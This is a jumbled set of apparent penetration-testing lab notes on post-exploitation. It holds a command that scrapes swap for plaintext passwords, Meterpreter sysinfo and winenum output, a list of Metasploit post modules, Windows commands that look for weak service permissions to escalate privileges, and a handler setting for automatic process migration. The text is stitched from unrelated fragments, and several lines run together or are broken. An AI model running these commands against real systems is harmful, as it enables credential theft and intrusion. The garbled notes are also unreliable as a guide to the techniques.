MimiPenguin.cat/proc/swaps strings /dev/sda5 | grep "&password=".meterpreter > sysinfo
Computer : ELS-WIN7
OS : Windows 7 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 172.50.50.20:4450...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331/ELS-WIN7_20160516.4331.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331
[*] Checking if ELS-WIN7 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Enabled
[*] Running Command List ...
[*] running command netstat -vb
meterpreter > run
Windows Post Gather Modules | Offensive Security
Linux Post Gather Modules | Offensive Security
Windows Post Manage Modules | Offensive Security
net start
wmic service list brief
C:\\Users\\els>wmic service > serv_list.txt
find "having write privileges on the path where the target service binary is stored".
icacls C:\\windows\\system32
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name
msf exploit(handler) > set AutoRunScript explorer.exe
msf exploit(handler) > set AutoRunScript migrate -f